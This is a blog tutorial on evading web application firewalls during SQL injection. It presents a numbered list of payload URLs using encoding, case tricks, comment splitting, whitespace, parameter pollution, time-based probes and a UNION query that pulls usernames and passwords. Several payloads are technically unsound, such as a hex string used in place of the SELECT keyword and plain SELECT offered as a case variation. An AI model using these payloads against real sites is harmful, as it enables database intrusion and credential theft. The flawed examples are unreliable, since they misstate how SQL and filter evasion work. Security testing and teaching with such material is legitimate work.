Blog | G5 Cyber Security

Bypassing WAF Filters in SQL Injection

G5 Cyber Security

TL;DR

Web Application Firewalls (WAFs) often block common SQL injection attempts. This guide shows techniques to bypass these filters, focusing on encoding, character manipulation, and alternative syntax. Remember ethical hacking principles – only test systems you have permission to access.

Understanding the Problem

A WAF sits between a user and a web server, inspecting incoming requests for malicious patterns (like SQL injection). It’s designed to block these attacks before they reach the database. Bypassing a WAF means finding ways to send SQL code that the WAF doesn’t recognise as harmful.

Solution Guide

  1. Identify the Filter Rules: Before attempting bypasses, try basic payloads to understand what the WAF blocks. Common blocked keywords include SELECT, UNION, DROP, and comments (--, /* */).
  2. Character Encoding: WAFs often struggle with different character encodings.
    • URL Encoding: Try encoding characters like spaces (%20), single quotes (%27), double quotes (%22) and equals signs (=). 
      http://example.com/page?id=1%27
    • Hex Encoding: Encode parts of your payload in hexadecimal. 
      http://example.com/page?id=0x41'
    • Unicode Encoding: Use Unicode representations of characters. 
      http://example.com/page?id=%u0027
  3. Case Manipulation: Some WAFs are case-sensitive. Try variations like SeLeCt, sElEcT, or SELECT. 
    http://example.com/page?id=1 SeLeCt * FROM users
  4. Comment Exploitation: WAFs may not fully understand nested comments.
    • Inline Comments: Use multiple inline comments to break up keywords. 
      http://example.com/page?id=1 /*!SELECT*/ * /*!FROM*/ users
    • Nested Comments: Try nesting comments. 
      http://example.com/page?id=1/* comment */SELECT/* comment */* FROM users
  5. Whitespace Variations: WAFs may not handle extra whitespace correctly.
    • Multiple Spaces: Add multiple spaces between keywords and identifiers. 
      http://example.com/page?id=1  SELECT * FROM users
    • Tab Characters (%09): Use tab characters instead of spaces. 
      http://example.com/page?id=1%09SELECT * FROM users
  6. Alternative Syntax: Explore different SQL syntax that achieves the same result.
    • Using Hexadecimal Representation of Strings: 
      http://example.com/page?id=1' AND 0x73656c656374 * FROM users WHERE 1=1
    • Concatenation: Use string concatenation operators (e.g., || in PostgreSQL, + in SQL Server). 
      http://example.com/page?id=1' + ' UNION SELECT username, password FROM users -- '
  7. HTTP Parameter Pollution (HPP): Send the same parameter multiple times with different values. The server might process them in an unexpected order. 
    http://example.com/page?id=1&id=%27
  8. Time-Based Blind SQL Injection: If direct data extraction is blocked, use time delays to infer information. 
    http://example.com/page?id=1' AND IF(substring(version(),1,1)='5',sleep(5),0)-- '
  9. Error-Based SQL Injection: If the database returns errors, craft payloads to reveal information. 
    http://example.com/page?id=1' AND (SELECT 1 FROM users WHERE username = 'admin')-- '
  10. Use Burp Suite or OWASP ZAP: These tools can help automate the process of testing different payloads and encoding schemes.

Important Note: WAFs are constantly evolving. Techniques that work today may not work tomorrow. Ethical considerations are paramount – always obtain explicit permission before testing any system for vulnerabilities.

Exit mobile version